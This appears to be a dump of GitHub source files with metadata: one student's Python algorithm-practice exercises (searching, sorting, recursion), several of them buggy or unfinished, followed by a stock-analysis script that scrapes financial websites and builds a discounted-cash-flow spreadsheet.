"text": "DepthLinkedLists(head, depth, list)\r\n if depth >= list.length():\r\n list.append(new Node(head.data))\r\n else:\r\n n = list[depth]\r\n while(n.next != null):\r\n n = n.next\r\n n.next = new Node(head.data)\r\n if(n.right and n.left == None):\r\n return list;\r\nlist = []\r\nDepthLinkedLists(root, 0):\r\n"
},
{
"alpha_fraction": 0.3782091438770294,
"alphanum_fraction": 0.38948026299476624,
"avg_line_length": 32.71739196777344,
"blob_id": "404f07017ef970aaaab981e57097f4fe2688a06a",
"content_id": "e596984adcc9875a1c782048097d82dddb65cdc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1597,
"license_type": "no_license",
"max_line_length": 209,
"num_lines": 46,
"path": "/Sorting/RotateSearch.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "import BinarySearch\r\n\r\ndef Rotate(arr, query, start, end):\r\n med = start + end // 2\r\n if arr[med] == query:\r\n return med\r\n if start >= end:\r\n return false\r\n if arr[med] < query:\r\n if arr[med] < arr[end]: # the rotation is in the first half\r\n if query == arr[end]:\r\n return end\r\n if query < arr[end]:\r\n print('he')\r\n BinarySearch(arr, query, med+1, end-1)\r\n else:\r\n Rotate(arr, query, start, med-1)\r\n else:\r\n if query == arr[end]:\r\n return end\r\n if query < arr[end]:\r\n Rotate(arr, query, med+1, end-1)\r\n else:\r\n print(\"today\")\r\n BinarySearch(arr,query, start, med-1)\r\n else:\r\n if arr[med] < arr[end]: # the rotation is in the firsthalf\r\n if query == arr[end]:\r\n return end\r\n if query > arr[end]:\r\n Rotate(arr, query, start, med-1)\r\n else:\r\n print(\"hel\")\r\n BinarySearch(arr, query, med+1, end-1)\r\n\r\n else:\r\n if query == arr[end]:\r\n return end\r\n if query > arr[end]:\r\n print('here')\r\n BinarySearch(arr, query, start, med-1) \r\n else:\r\n Rotate(arr, query, med+1, end)\r\n\r\narr =[4,1,2,3]\r\nRotate( arr, 3, 0, len(arr))\r\n"
},
{
"alpha_fraction": 0.4307304918766022,
"alphanum_fraction": 0.48362720012664795,
"avg_line_length": 22.8125,
"blob_id": "616b0166f23395bd92cbe061adb45f95b01d016e",
"content_id": "bf139f8ee2f817846e946bb1e8bb8f16bf87a085",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 16,
"path": "/DP and Recursion/MagicIndex.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "def Mag(arr, start, end):\r\n med = (start+ end) // 2\r\n if arr[med] == med:\r\n return True\r\n if start == end:\r\n return False\r\n else:\r\n if arr[med] > med:\r\n return Mag(arr,start, med -1)\r\n else:\r\n return Mag(arr, med+1, end)\r\n\r\n Mag(arr, 0, len(arr)-1)\r\n\r\nmyArray = [-10,-5,2,2,2,3,4,7,9,12,13]\r\nprint(Mag(myArray, 0, len(myArray)-1))\r\n"
},
{
"alpha_fraction": 0.44086021184921265,
"alphanum_fraction": 0.47311827540397644,
"avg_line_length": 16.600000381469727,
"blob_id": "2d208f5995fd53d8c821c67c9f0c9adbbb7cdeeb",
"content_id": "a6b51261494845e7aa304827bf9818de275613af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 5,
"path": "/Sorting/MergeBtoA.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "def Merge(A,B):\r\n aIndex = len(A)-1\r\n bIndex = len(B)-1\r\n \r\n while bIndex >= 0:\r\n"
},
{
"alpha_fraction": 0.5666666626930237,
"alphanum_fraction": 0.5888888835906982,
"avg_line_length": 20.5,
"blob_id": "8f37aeca368377d87a20133f7b9e81b2e3de4ecc",
"content_id": "fad559a93c5230d83d781a52175bd119983dc235",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 4,
"path": "/Strings/urlify.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "def urlify(string):\r\n return string.replace(\" \", \"%20\")\r\n\r\nprint(urlify(\"Mr John Smith\"))\r\n"
},
{
"alpha_fraction": 0.4680365324020386,
"alphanum_fraction": 0.49771690368652344,
"avg_line_length": 22.33333396911621,
"blob_id": "ed1c5103353a860898ade95c403716946b394fae",
"content_id": "1624cb3bffb7074f545972d5dcbd9968f27afb8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 18,
"path": "/Sorting/QuickSort.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "def QuickSort(arr):\r\n if len(arr) < 4:\r\n arr.sort()\r\n return arr\r\n med = len(arr) //2\r\n left = []\r\n right = []\r\n for item in arr:\r\n if item < arr[med]:\r\n left.append(item)\r\n elif item != arr[med]:\r\n right.append(item)\r\n left = QuickSort(left)\r\n right = QuickSort(right)\r\n left.append(arr[med])\r\n return left + right\r\n\r\nprint(QuickSort([2,1,3,4,7,-4,0,99,11]))\r\n"
},
{
"alpha_fraction": 0.49537035822868347,
"alphanum_fraction": 0.5092592835426331,
"avg_line_length": 26.799999237060547,
"blob_id": "3740f9f8dd0fb0dbdca11fdadf9a8d9897297faf",
"content_id": "8adc324b189f55b5998ae593410efd475f597d37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 432,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 15,
"path": "/DP and Recursion/PowerSet.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "def Power(original):\r\n if len(original) == 0:\r\n powerSet = []\r\n powerSet.append(original)\r\n return powerSet\r\n else:\r\n item = original.pop()\r\n powerSet = Power(original)\r\n bigboi = powerSet.copy()\r\n for set in bigboi:\r\n copy = set.copy()\r\n copy.add(item)\r\n powerSet.append(copy)\r\n return powerSet\r\nprint(len(Power({1,2,3,9,'p','t',4})))\r\n"
},
{
"alpha_fraction": 0.47826087474823,
"alphanum_fraction": 0.5403726696968079,
"avg_line_length": 15.88888931274414,
"blob_id": "2b730c5bc2cd00293a8055fa948625d696b48b07",
"content_id": "dc9a5ad2d13832b4b018a1564e269cee995f7e49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 9,
"path": "/DP and Recursion/Stairs.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "list = [1,2,4]\r\n\r\n\r\ndef Stairs(n):\r\n if n > len(list):\r\n list.append(Stairs(n-1)+Stairs(n-2)+Stairs(n-3))\r\n return list[n-1]\r\n\r\nprint(Stairs(223))\r\n"
},
{
"alpha_fraction": 0.41017964482307434,
"alphanum_fraction": 0.46706587076187134,
"avg_line_length": 28.363636016845703,
"blob_id": "77b7f49f85d61ede8b4eef367f7c1d4440062bc8",
"content_id": "7f1061d87a73e538c81d73cfde004449981a59d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 668,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 22,
"path": "/LinkedLists/Sum.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "#reverse order\r\n\r\ndef sum(head_1, head_2, carry):\r\n if head_1 != None and head_2 != None:\r\n if head_1.data + head_2.data > 9\r\n sum(head1.next, head_2.next, 1)\r\n else:\r\n sum(head1.next, head_2.next, 0)\r\n head_1.data = head_1.data + head_2.data\r\n if head_1 != None:\r\n if head_1 == 9 and carry == 1:\r\n sum(head_1.next, head_2, 1)\r\n else:\r\n sum(head_1.next, head_2,0)\r\n if head_2 != None:\r\n if head_2 == 9 and carry == 1:\r\n sum(head_1.next, head_2, 1)\r\n else:\r\n sum(head_1.next, head_2,0)\r\n head_1 = head_2\r\n else:\r\n return None;\r\n"
},
{
"alpha_fraction": 0.7599999904632568,
"alphanum_fraction": 0.7599999904632568,
"avg_line_length": 23,
"blob_id": "a8fffb6ffff8f30987fd19e20806a6230cb3711b",
"content_id": "1237dd5f8cdd54923a15d48b59e6d53c972db35a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 25,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 1,
"path": "/Stacks&Queues/StackofStacks.java",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "public class MyStack<T>\r\n"
},
{
"alpha_fraction": 0.43824702501296997,
"alphanum_fraction": 0.4462151527404785,
"avg_line_length": 20.81818199157715,
"blob_id": "5cb5e9913b31ed3d30ae7cb01abe4547ba39d6b8",
"content_id": "1433bde182342e4eea7fefe9f04a802801029d50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 502,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 22,
"path": "/Strings/Palindromeperm.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "def palindrome(string):\r\n dict = {}\r\n string = string.lower()\r\n for char in string:\r\n if char == \" \":\r\n pass\r\n elif char not in dict:\r\n dict[char] = 1\r\n else:\r\n dict[char] += 1\r\n values = dict.values()\r\n middle = False\r\n for value in values:\r\n if value % 2 == 1:\r\n if not middle:\r\n middle = True\r\n else:\r\n return False\r\n return True\r\n\r\n\r\nprint(palindrome(\"racerac\"))\r\n"
},
{
"alpha_fraction": 0.49145859479904175,
"alphanum_fraction": 0.5308803915977478,
"avg_line_length": 26.185184478759766,
"blob_id": "c62ce2593c26aeda724cb57b105b23682281ab97",
"content_id": "25d55b12d6885213169a3f2c34c9ec5d0e6ec3e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 761,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 27,
"path": "/Sorting/MergeSort.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "def Merge(left, right):\r\n sorted = []\r\n leftmark = 0\r\n rightmark = 0\r\n while len(sorted) != (len(left)+len(right)):\r\n if leftmark == len(left):\r\n sorted.append(right[rightmark])\r\n rightmark += 1\r\n elif rightmark == len(right) or left[leftmark] <= right[rightmark]:\r\n sorted.append(left[leftmark])\r\n leftmark +=1\r\n else:\r\n sorted.append(right[rightmark])\r\n rightmark += 1\r\n return sorted\r\n\r\ndef MergeSort(arr):\r\n if len(arr) < 4:\r\n arr.sort()\r\n return arr\r\n med = len(arr) // 2\r\n left = MergeSort(arr[0:med])\r\n right = MergeSort(arr[med:])\r\n return Merge(left,right)\r\n\r\n\r\nprint(MergeSort([3,2,1,4,0,-5,4,77,100,99999,-45,6,7,8]))\r\n"
}
] | 14 |
nimotsu/stock | https://github.com/nimotsu/stock | e89e7aff7582654f3e89e9741400dd89efe60d59 | 663d8e17244d9a9587e082cbe861b894ae83179d | 63da5874bdeaa9d9d61498bf081665a396f55f3e | refs/heads/master | 2023-08-17T09:32:38.750664 | 2021-09-18T14:34:13 | 2021-09-18T14:34:13 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5598836541175842,
"alphanum_fraction": 0.5850213170051575,
"avg_line_length": 34.39706039428711,
"blob_id": "c0cfac2b12315045e7bc78280a750cc586bf5128",
"content_id": "bc8119fee93e34a20d29b3d05153b1134324d78c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9627,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 272,
"path": "/scrape.py",
"repo_name": "nimotsu/stock",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\nimport sys\nimport xlsxwriter\nimport datetime\n\nfrom stock import Stock\nfrom stock import Webpage\n\nimport os\nimport numpy as np\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nnow = datetime.datetime.now()\n\n\ndef search(term: str, df, index = 1):\n result = df[df[0].str.contains('(?i)' + term)][index].values[0]\n result = str(result)\n result = result.replace(\",\", \"\")\n if '%' in result:\n result = result.replace(\"%\", \"\")\n result = float(result) / 100\n try:\n return float(result)\n except:\n return result\n\n\ndef rename_excel(my_stock, excel_name):\n \"\"\"rename excel sheet with npv and last price for easy viewing\"\"\"\n\n operating_cf = search(\"Cash From Operating Activities\", my_stock.cash_flow)\n shares_outstanding = search(\"Shares Outstanding\", my_stock.overview)/1000000\n last_price = search(\"Last Price\", my_stock.overview)\n\n cash_flow = []\n for i in range(1, 11):\n operating_cf = operating_cf * (1 + my_stock.growth_rate)\n cash_flow.append(operating_cf)\n\n values = cash_flow\n rate = my_stock.discount_rate\n\n npv = (values / (1+rate)**np.arange(1, len(values)+1)).sum(axis=0) / shares_outstanding\n print(f\"NPV per Share: {npv}\")\n print(f\"Last Price: {last_price}\")\n\n os.rename(excel_name, my_stock.stock_cd + \"-\" + str(round(npv, 2)) + \"-\" + str(last_price) + \".xlsx\") \n\n\ndef analyse(company_name):\n my_stock = Stock(company_name)\n\n excel_name = \"stocks/\" + my_stock.stock_cd + \".xlsx\"\n sheet_name = \"Sheet1\"\n\n # colours\n blue = '#98C4D1'\n yellow = '#FEC240'\n red = '#DE4B43'\n\n # writer = pd.ExcelWriter(excel_name, engine='xlsxwriter') writer.save()\n workbook = xlsxwriter.Workbook(excel_name)\n worksheet = workbook.add_worksheet(sheet_name)\n\n # format excel\n worksheet.set_row(0, 40)\n worksheet.set_column('A:A', 20)\n worksheet.set_column('A:I', 10)\n\n title_format = workbook.add_format({\n 'bold': True,\n 'font_color': blue,\n 'font_size': 16\n })\n currency_format = workbook.add_format({\n 'num_format': '$#,##0.00',\n 'border': 1\n })\n percentage_format = workbook.add_format({\n 'num_format': '0.0%',\n 'bg_color': blue,\n 'border': 1\n })\n colored_format = workbook.add_format({\n 'bg_color': blue,\n 'border': 1\n })\n colored_currency_format = workbook.add_format({\n 'num_format': '$#,##0.00',\n 'bg_color': blue,\n 'border': 1\n })\n border_format = workbook.add_format({\n 'border': 1\n })\n\n\n # Stock and write to excel\n\n # Required data for npv calculation, table 1\n # --------------------------------------------------------\n table01 = (0, 0)\n table1 = {\n \"Name of Stock\": my_stock.stock_cd.replace(\"-\", \" \").title(),\n \"Operating Cash Flow\": search(\"Cash From Operating Activities\", my_stock.cash_flow),\n \"Total Debt\": search(\"Total Long Term Debt\", my_stock.balance_sheet),\n \"Cash & Equivalent\": search(\"Cash & Equivalent\", my_stock.balance_sheet),\n \"Growth Rate\": 0,\n \"No. of Shares Outstanding\": search(\"Shares Outstanding\", my_stock.overview) / 1000000,\n \"Discount Rate\": 0\n }\n\n worksheet.write_column('A1', table1.keys(), border_format)\n worksheet.write_column('B1', table1.values(), colored_currency_format)\n\n # rewrite in title and percentage format\n worksheet.write('B1', my_stock.stock_cd.replace(\"-\", \" \").title(), title_format)\n worksheet.write('B5', my_stock.growth_rate, percentage_format)\n worksheet.write('B7', my_stock.discount_rate, percentage_format)\n\n\n # Ten-year cash flow calculations, bottom table\n # --------------------------------------------------------\n table11 = (11, 0)\n calc_row = table11[0]\n\n # headers\n worksheet.write_column(calc_row, 0, [\"Year\", \"Cash Flow\", \"Discount Rate\", \"Discounted Value\"], border_format)\n worksheet.write_row(calc_row, 1, list(range(now.year, now.year + 10, 1)), border_format)\n\n # calculation formulas\n cash_flow = [\"=B2*(1+B5)\"]\n cash_flow.extend([\"=\" + chr(ord('B') + i) + str(calc_row+2) + \"*(1+$B$5)\" for i in range(10)])\n # +1, +2\n cf_row = calc_row + 1\n for i in range(10):\n worksheet.write_formula(cf_row, i+1, cash_flow[i], currency_format)\n \n # +2, +3\n dr_row = calc_row + 2\n discount_rate = [\"=1/(1 + $B$7)^\" + str(i) for i in range(1, 11)]\n for i in range(10):\n worksheet.write_formula(dr_row, i+1, discount_rate[i], border_format)\n\n # +3, +4\n dv_row = calc_row + 3\n discounted_value = [\"=PRODUCT(\"+chr(ord('B')+i)+str(cf_row+1)+\":\"+chr(ord('B')+i)+str(dr_row+1)+\")\" for i in range(10)]\n for i in range(10):\n worksheet.write_formula(dv_row, i+1, discounted_value[i], currency_format)\n\n\n # NPV and intrinsic values calculations, table 2\n # --------------------------------------------------------\n # table02 = ()\n worksheet.write_column('D2', [\"PV of 10 yr Cash Flows\", \"Intrinsic Value per Share\", \n \"- Debt per Share\", \"+ Cash per share\", \"net Cash per Share\"], border_format)\n worksheet.write_column('E2', [f\"=SUM(B{dv_row+1}:K{dv_row+1})\", \"=E2/B6\", \"=B3/B6\", \"=B4/B6\", \"=E3-E4+E5\"], colored_currency_format)\n\n\n # Stock overview, table 3\n # --------------------------------------------------------\n # table03 = ()\n df = my_stock.overview.reset_index(drop=True)\n index = [0, 5, 6, 7, 8, 9, 11, 15]\n worksheet.write_column('G2', df.iloc[index, 0], border_format)\n worksheet.write_column('H2', df.iloc[index, 1], colored_format)\n\n\n # Jot down links from simply wall st and infront analytics\n # --------------------------------------------------------\n row = table11[0] + 5\n worksheet.write_column(row, 0, my_stock.urls)\n\n\n # Overview by i3investor\n # --------------------------------------------------------\n i3summary = my_stock.i3summary\n i3business_performance = my_stock.i3business_performance\n\n # i3investor table, table 4\n # table04 = ()\n i3summary_column = 9\n worksheet.set_column(i3summary_column, i3summary_column+1, 20) # Width of column B set to 30.\n\n worksheet.write_column(1, i3summary_column, i3summary[0], border_format)\n worksheet.write_column(1, i3summary_column+1, i3summary[1], colored_currency_format)\n\n # summary tables\n start_row = 23\n start_column = 0\n\n for key in i3business_performance:\n worksheet.write(start_row, start_column, key)\n \n cur_df = i3business_performance[key]\n for col in cur_df.columns:\n cur_col = []\n cur_col.append(col.replace(\"Unnamed: 0\", \"\"))\n cur_col.extend(cur_df[col])\n worksheet.write_column(start_row+1, start_column, cur_col, border_format)\n start_column += 1\n start_column += 1\n\n\n # Ratios by investing, table 5\n # --------------------------------------------------------\n # table05\n start_row = 1\n start_column = 12\n ratios_header = my_stock.ratios.head(6)\n ratios_header = ratios_header.rename({0: '', 1: 'Company', 2: 'Industry'}, axis=1)\n for col in ratios_header.columns:\n cur_col = []\n cur_col.append(col)\n cur_col.extend(ratios_header[col])\n worksheet.write_column(start_row, start_column, cur_col, border_format)\n start_column += 1\n\n total_assets = search(\"Total Assets\", my_stock.balance_sheet)\n total_liabilities = search(\"Total Liabilities\", my_stock.balance_sheet)\n current_shares_outstanding = search(\"Total Common Shares Outstanding\", my_stock.balance_sheet)\n total_equity = search(\"Total Equity\", my_stock.balance_sheet)\n\n net_assets = total_assets - total_liabilities\n net_asset_value = net_assets / current_shares_outstanding\n net_asset_value = round(net_asset_value, 2)\n\n table5 = {\n \"EPS\": search(\"Basic EPS ANN\", my_stock.ratios),\n \"EPS(MRQ) vs Qtr. 1 Yr. Ago MRQ\": search(\"EPS\\(MRQ\\) vs Qtr. 1 Yr. Ago MRQ\", my_stock.ratios),\n \"EPS(TTM) vs TTM 1 Yr. Ago TTM\": search(\"EPS\\(TTM\\) vs TTM 1 Yr. Ago TTM\", my_stock.ratios),\n \"5 Year EPS Growth 5YA\": search(\"5 Year EPS Growth 5YA\", my_stock.ratios),\n \n \"Return on Equity TTM\": search(\"Return on Equity TTM\", my_stock.ratios),\n \"Return on Equity 5YA\": search(\"Return on Equity 5YA\", my_stock.ratios),\n \n \"Price to Earnings Ratio\": search(\"P/E Ratio TTM\", my_stock.ratios),\n \n \"Dividend per Share\": search(\"Dividend Yield ANN\", my_stock.ratios),\n \"Dividend Yield 5 Year Avg. 5YA\": search(\"Dividend Yield 5 Year Avg. 5YA\", my_stock.ratios),\n \"Dividend Growth Rate ANN\": search(\"Dividend Growth Rate ANN\", my_stock.ratios),\n \n \"Net Asset per Share\": net_asset_value,\n \"Price to Book\": search(\"Price to Book MRQ\", my_stock.ratios),\n \"LT Debt to Equity\": search(\"LT Debt to Equity\", my_stock.ratios)\n }\n\n # Continuation, table 5\n start_row = len(ratios_header) + 2\n start_column = 12\n worksheet.write_column(start_row, start_column, table5.keys(), border_format)\n worksheet.write_column(start_row, start_column+1, table5.values(), colored_format)\n\n workbook.close()\n # Shift + Ctrl + F9\n\n rename_excel(my_stock, excel_name)\n\n\ndef main():\n # print('Number of arguments: {}'.format(len(sys.argv[1:])))\n # print('Argument(s) passed: {}'.format(str(sys.argv[1:])))\n\n companies = sys.argv[1:]\n list(map(lambda x: analyse(x),companies))\n \nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5660919547080994,
"alphanum_fraction": 0.5769766569137573,
"avg_line_length": 36.28895950317383,
"blob_id": "4063a3a428bbd912ce8d7ddf1109907d57d9f1df",
"content_id": "0e89d2f81043db778b2bbf5563ff1b8eee4d1eb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11484,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 308,
"path": "/stock.py",
"repo_name": "nimotsu/stock",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas as pd\nimport re\nfrom bs4 import BeautifulSoup\n\ndef url2html(url, headers=None, params=None, data=None):\n headers={'User-Agent': 'Mozilla/5.0'}\n try:\n req = requests.get(url, headers=headers, params=params, data=data)\n except:\n req = requests.get(url, headers=headers, params=params, data=data, verify=False)\n html = req.text\n return html\n\n \n# Handle all urls and htmls\nclass Webpage:\n def __init__(self, html):\n self.html = html\n self.soup = BeautifulSoup(self.html, 'html.parser')\n try:\n self.tables = pd.read_html(self.html)\n except:\n self.tables = None\n \n @classmethod\n def from_url(cls, url, headers=None, params=None, data=None):\n \"\"\"constructor with url\"\"\"\n\n html = url2html(url, headers)\n return cls(html)\n \n def get_span(self, tag: str, class_name: list):\n \"\"\"return df from columns not in <table>\"\"\"\n \n def get_tag(tag, class_name):\n tags = self.soup.find_all(tag, {'class': class_name})\n text = [i.get_text() for i in tags if i.get_text() != '']\n return text\n \n attrib = get_tag(tag, class_name[0])\n data = get_tag(tag, class_name[1])\n\n ls = list(zip(attrib, data))\n df = pd.DataFrame(ls)\n return df\n\n\n\n# Handle all methods related to stock\nclass Stock:\n def __init__(self, company):\n self.urls = []\n self.stock_cd = self.scrape_link(company)\n print(f\"Stock Cd: {self.stock_cd}\")\n\n self.overview, self.stock_id, investing_url = self.scrape_overview()\n print(f\"Stock Id: {self.stock_id}\")\n\n self.growth_rate, simplywallst_url = self.scrape_growth_rate()\n self.beta, infrontanalytics_url = self.scrape_beta()\n self.discount_rate = self.scrape_discount_rate()\n self.i3summary, self.i3business_performance, i3investor_url = self.scrape_isummary()\n self.urls.append(investing_url)\n self.urls.append(simplywallst_url)\n self.urls.append(infrontanalytics_url)\n self.urls.append(i3investor_url)\n\n self.ratios = self.scrape_ratios()\n self.cash_flow = self.scrape_cash_flow()\n self.balance_sheet = self.scrape_balance_sheet()\n # self.income_statementp = Webpage.from_url(f\"https://www.investing.com/equities/{stock_cd}-income-statement\")\n # self.earningsp = Webpage.from_url(f\"https://www.investing.com/equities/{stock_cd}-earnings\")\n # self.financialp = Webpage.from_url(f\"https://www.investing.com/equities/{stock_cd}-financial-summary\")\n\n def scrape_link(self, company):\n headers = {\n 'User-Agent': 'Mozilla/5.0',\n }\n params = (\n ('q', company),\n )\n response = requests.get('https://www.investing.com/search/', headers=headers, params=params)\n soup = BeautifulSoup(response.text)\n result = soup.find('a', ['js-inner-all-results-quote-item'])\n stock_cd = result['href'].replace(\"/equities/\", \"\")\n return stock_cd\n\n \"\"\"\n Simply Wall St\n \"\"\"\n def scrape_growth_rate(self):\n \"\"\"scrape growth rate from simply wall st\"\"\"\n\n # search the link for stock\n stock_cd = self.stock_cd.replace(\"-\", \" \")\n params = (\n ('x-algolia-agent', 'Algolia for JavaScript (4.2.0); Browser (lite)'),\n ('x-algolia-api-key', 'be7c37718f927d0137a88a11b69ae419'),\n ('x-algolia-application-id', '17IQHZWXZW'),\n )\n data = f'{{\"query\":\"{stock_cd} klse\",\"highlightPostTag\":\" \",\"highlightPreTag\":\" \",\"restrictHighlightAndSnippetArrays\":true}}'\n try:\n response = requests.post('https://17iqhzwxzw-dsn.algolia.net/1/indexes/companies/query', params=params, data=data)\n\n # generate link\n stock_url = response.json()['hits'][0]['url']\n url = \"https://simplywall.st\" + stock_url\n except:\n return None\n \n html = url2html(url)\n soup = BeautifulSoup(html, 'html.parser')\n growth = soup.find('p', {'data-cy-id': 'key-metric-value-forecasted-annual-earnings-growth'}).get_text().replace('%', '')\n self.growth_rate = float(growth) / 100\n print(f\"Growth Rate: {self.growth_rate}\")\n return self.growth_rate, url\n \n \"\"\"\n Infront Analytics\n \"\"\"\n def scrape_beta(self):\n \"\"\"scrape beta from infrontanalytics.com\"\"\"\n\n # search the link for stock\n params = (\n ('keyname', self.stock_cd.replace(\"-\", \" \")),\n )\n response = requests.get('https://www.infrontanalytics.com/Eurofin/autocomplete', params=params, verify=False)\n result = response.json()[0]\n\n # generate stock url\n name = result['name'].replace(\" \", \"-\").replace(\".\", \"\") + \"-\"\n code = result['isin']\n url = f\"https://www.infrontanalytics.com/fe-en/{code}/{name}/beta\"\n\n # get beta\n html = url2html(url)\n m = re.search(r\"shows a Beta of ([+-]?\\d+\\.\\d+).\", html)\n beta = m.groups()[0]\n print(f\"Beta: {beta}\")\n return float(beta), url\n \n def scrape_discount_rate(self):\n \"\"\"convert beta to discount rate for dcf model\"\"\"\n \n discount_rate = 0\n dr = {\n 0.8: 5, \n 1: 6, \n 1.1: 6.8, \n 1.2: 7, \n 1.3: 7.9, \n 1.4: 8, \n 1.5: 8.9\n }\n for key in dr:\n if self.beta <= key:\n discount_rate = dr[key]\n else:\n discount_rate = 9\n discount_rate = round(discount_rate/100, 2)\n print(f\"Discount Rate: {discount_rate}\")\n return discount_rate\n\n \"\"\"\n i3investor\n \"\"\"\n def scrape_isummary(self):\n # search for link in the website\n headers = {'User-Agent': 'Mozilla'}\n params = (\n ('qt', 'lscomn'),\n ('qp', 'nestle'),\n )\n response = requests.get('https://klse.i3investor.com/cmservlet.jsp', headers=headers, params=params)\n query = response.text.split(\":\")[0]\n\n # generate link to stock page\n params = (\n ('sa', 'ss'),\n ('q', query),\n )\n response = requests.get('https://klse.i3investor.com/quoteservlet.jsp', headers=headers, params=params)\n\n # scrape for id from stock page\n html = response.text\n soup = BeautifulSoup(html)\n stock_name = soup.find('span', {'class': 'stname'}).text\n stock_name = re.search(\"\\((\\d+)\\)\", stock_name)\n stock_id = stock_name.groups()[0]\n\n # generate link to summary page\n url = f\"https://klse.i3investor.com/servlets/stk/fin/{stock_id}.jsp?type=summary\"\n html = url2html(url)\n soup = BeautifulSoup(html)\n\n # get all summary tables\n result = soup.find_all('div', {'id': 'headerAccordion'})\n i3summary = pd.read_html(str(result[3]))[0]\n\n # get business performance tables\n result = soup.find_all('div', {'id': 'summaryAccordion'})\n business_performance_by_year = pd.read_html(str(result[1]))[0].dropna()\n key_result = pd.read_html(str(result[2]))[0].dropna()\n growth_by_year = pd.read_html(str(result[4]))[0].dropna()\n\n i3business_performance = {\n \"Business Peformance (by Year)\": business_performance_by_year,\n \"Key Result\": key_result[['Annual (Unaudited)', 'Last 10 FY Average', 'Last 5 FY Average']],\n \"Growth (by Year)\": growth_by_year[['LFY YoY', 'LFY vs AL5FY', 'LFY vs AL10FY']]\n }\n return i3summary, i3business_performance, url\n \n\n \"\"\"\n investing\n \"\"\"\n def scrape_overview(self):\n stock_cd = self.stock_cd\n def scrape_id(overviewp):\n m = re.search('data-pair-id=\"(\\d+)\"', overviewp.html)\n stock_id = m.groups()[0]\n return stock_id\n\n url = f\"https://www.investing.com/equities/{stock_cd}\"\n overviewp = Webpage.from_url(url)\n soup = overviewp.soup\n last_price = soup.find('span', {'id':'last_last'}).get_text()\n ls = ['Last Price', last_price]\n df = pd.DataFrame([ls])\n \n overview = overviewp.get_span('span', ['float_lang_base_1', 'float_lang_base_2'])\n stock_id = scrape_id(overviewp)\n\n return pd.concat([df, overview]), stock_id, url\n \n def scrape_ratios(self):\n stock_cd = self.stock_cd\n ratiosp = Webpage.from_url(f\"https://www.investing.com/equities/{stock_cd}-ratios\")\n tables = ratiosp.tables\n numbers = range(1, 9)\n ratios = pd.concat(tables[i] for i in numbers)\n return ratios\n \n def scrape_cash_flow(self):\n stock_id = self.stock_id\n cash_flowp = Webpage.from_url(f\"https://www.investing.com/instruments/Financials/changereporttypeajax?action=change_report_type&pair_ID={self.stock_id}&report_type=CAS&period_type=Annual\")\n df = cash_flowp.tables[0]\n cash_flow = df[~df[1].str.contains(\"a|e|i|o|u\")]\n return cash_flow\n \n def scrape_balance_sheet(self):\n stock_id = self.stock_id\n balance_sheetp = Webpage.from_url(f\"https://www.investing.com/instruments/Financials/changereporttypeajax?action=change_report_type&pair_ID={self.stock_id}&report_type=BAL&period_type=Annual\")\n df = balance_sheetp.tables[0]\n balance_sheet = df[~df[1].str.contains(\"a|e|i|o|u\")]\n return balance_sheet\n \n def scrape_earnings(self):\n stock_cd = self.stock_cd\n s = requests.Session()\n url = f\"https://www.investing.com/equities/{self.stock_cd}-earnings\"\n headers={ \"User-Agent\": \"Mozilla/5.0\"}\n r = s.get(url, headers={ \"User-Agent\": \"Mozilla/5.0\"})\n \n # get more history - to work on\n '''\n more_history = \"https://www.investing.com/equities/morehistory\"\n headers = {\n 'User-Agent': 'Mozilla/5.0',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Referer': url,\n }\n data = {\"pairID\" : \"41688\", \"last_timestamp\": \"2019-0-02\"}\n r = s.post(more_history, headers=headers, cookies=r.cookies, data=data)\n 